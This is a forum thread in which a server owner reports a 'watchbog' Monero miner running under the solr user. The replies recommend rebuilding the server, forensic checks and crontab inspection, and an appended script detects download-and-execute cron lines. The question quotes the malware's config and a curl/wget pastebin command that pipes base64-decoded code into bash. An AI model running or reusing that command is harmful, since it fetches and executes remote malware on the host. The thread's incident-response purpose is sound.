
I have found this question below, but I need some more clarification; that's why I am writing again.

I have a process called “watchbog” that is completely hogging my CPU and I don't know what it is

So I did some digging, and found that an executable is being run from the /tmp directory. The folder structure is something like this:

/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data

In that folder there are two files: one executable, watchbog, which is actually being run, and one config.json. This is the content of the config file:

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "asm": true,
    "autosave": true,
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": 3,
    "donate-level": 1,
    "huge-pages": false,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "pool.minexmr.com:443",
            "user": "4AbjKdQkedGZXvzm6VxMJb1zLB2CAmCmXdoCisRsQFAUPs4TWFePDUcZzk5ui4EdZXT3uaXXtssqPCoKQPTz7PeZNkKASkm.old",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": [
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        },
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        }
    ],
    "user-agent": null,
    "syslog": false,
    "watch": false
}

But deleting the folders is not helping; they are being recreated within a few seconds. So I tried to see what other processes are running, and I found these:

solr     32616  0.0  0.0   4504   780 ?        Ss   13:10   0:00 /bin/sh -c (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- h
solr     32618  0.0  0.0  11224  2924 ?        S    13:10   0:00 bash
solr     32623  0.2  0.0  11644  3376 ?        S    13:10   0:00 /bin/bash
solr     32656  200  0.1 270204  6996 ?        Ssl  13:10   0:26 ./watchbog

The pastebin URL points to another shell command with another pastebin URL.

(curl -fsSL https://pastebin.com/raw/nMrfmnRa||wget -q -O- https://pastebin.com/raw/nMrfmnRa) | base64 -d | /bin/bash

This second pastebin URL points to a base64-encoded shell script. I can't include it here due to the character limit. Here is the link: https://pastebin.com/raw/nMrfmnRa

I am no expert in this field, but it looks like the script is setting a cron job which downloads the executable again.

This is all I could find on my own. Can anyone please guide me as to how I can stop this whole thing, or would I have to redeploy the server again?

Sayantan Das
  • Your server is compromised; besides the Monero miner, there are possibly many other compromises, including backdoors. Back up important stuff and redeploy the server from scratch, install patches and redeploy the server. – mootmoot Jan 11 '19 at 08:32
  • @mootmoot Thank you. I guess I'd have to redeploy the server again. Any idea on how I could possibly approach finding out how the compromise happened? One thing I could see is that the executable is running as user `solr` in the system, which was created when I installed `solr` on the server. Anyway, it's a broad topic, so it's okay if you can't help me with that. – Sayantan Das Jan 11 '19 at 09:00
  • Well, you can create a mirror of the compromised server and test out your hypothesis, e.g. check whether your solr installation contains vulnerabilities or allows query injection that compromised the server. – mootmoot Jan 11 '19 at 10:04
  • The coders at least have a sense of humor. At one of the fail points: "'Sorry boss I can\'t get instructions'" – Connor Peoples Jan 12 '19 at 03:44
  • It is [Monero Mining malware](https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang) from the Rocke Group, which is a Chinese organization. – Mar 21 '19 at 02:54

2 Answers

From my point of view, there is no way to tell if the rest of the server is safe or not. If I were you, I'd handpick files to save and recreate a fresh server to ensure that it isn't compromised. Otherwise you could end up like BlankMediaGames and have files leaked years later. Better safe than sorry.

Thryn

Maybe you can determine if the rest of the server is compromised or not, but it depends on a forensic investigation. You can start with a few commands and guidance from this link: https://staff.washington.edu/dittrich/misc/forensics/. It is a little bit basic, but it will help you provide a better recommendation to the business instead of simply guessing. Meanwhile, I suggest you create a fresh server to avoid business interruption.

Additionally, I suggest you block the malicious URL (the one which communicates over :443) in your network perimeter and check crontab routines.

Ahhhhh... if you found something that is grabbing information from Pastebin and you have a Pro account, you can ask Pastebin to take down that specific address.
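A small POSIX sh triage helper for the two things pointed at above, checking crontab routines and spotting what runs from /tmp, as an added example (not code from the original post or either answer). The cron file paths are assumptions for a Debian/Ubuntu-style host and the sample crontab is constructed with placeholder hosts.

```shell
#!/bin/sh
# Added triage helper, not code from the original post or answers. Flags
# cron lines that fetch remote content with curl/wget and pipe it into
# base64 -d or a shell (the pastebin -> base64 -d -> /bin/bash chain from
# the question) and lists processes whose executable lives under /tmp.
# Return 0 if one cron line looks like a download-and-execute chain.
is_download_exec_line() {
    case "$1" in
        '#'*|'') return 1 ;;   # comments and blank lines are never hits
    esac
    printf '%s\n' "$1" |
        grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(base64[[:space:]]+-d|(/bin/)?(ba)?sh)([[:space:]]|$)'
}

# Print every suspicious line read from stdin, prefixed with its line number.
scan_cron_lines() {
    n=0
    while IFS= read -r line; do
        n=$((n + 1))
        is_download_exec_line "$line" && printf 'SUSPECT line %d: %s\n' "$n" "$line"
    done
    return 0
}

# Concatenate the files cron reads (system crontab, drop-ins, per-user tabs; assumed paths).
dump_cron_sources() {
    cat /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/* 2>/dev/null
    return 0
}

# PIDs whose executable resolves under /tmp, /var/tmp or /dev/shm.
procs_from_tmp() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in
            /tmp/*|/var/tmp/*|/dev/shm/*) printf '%s %s\n' "${p#/proc/}" "$exe" ;;
        esac
    done
    return 0
}

# Constructed sample crontab with placeholder hosts (not the URLs from the post).
SAMPLE_CRONTAB='*/5 * * * * (curl -fsSL https://paste.invalid/raw/EXAMPLE||wget -q -O- https://paste.invalid/raw/EXAMPLE)|bash
0 3 * * * /usr/bin/apt-get update
# * * * * * curl http://example.invalid/x | sh
* * * * * wget -q -O- http://example.invalid/x | base64 -d | /bin/bash'
if [ "${1:-}" = "--live" ]; then          # ./triage.sh --live on the suspect host
    dump_cron_sources | scan_cron_lines; procs_from_tmp
else                                       # default: run against the sample
    printf '%s\n' "$SAMPLE_CRONTAB" | scan_cron_lines
fi
```

Run it with `--live` on the affected host to scan the real cron sources and list processes executing from temporary directories; without arguments it only scans the embedded sample.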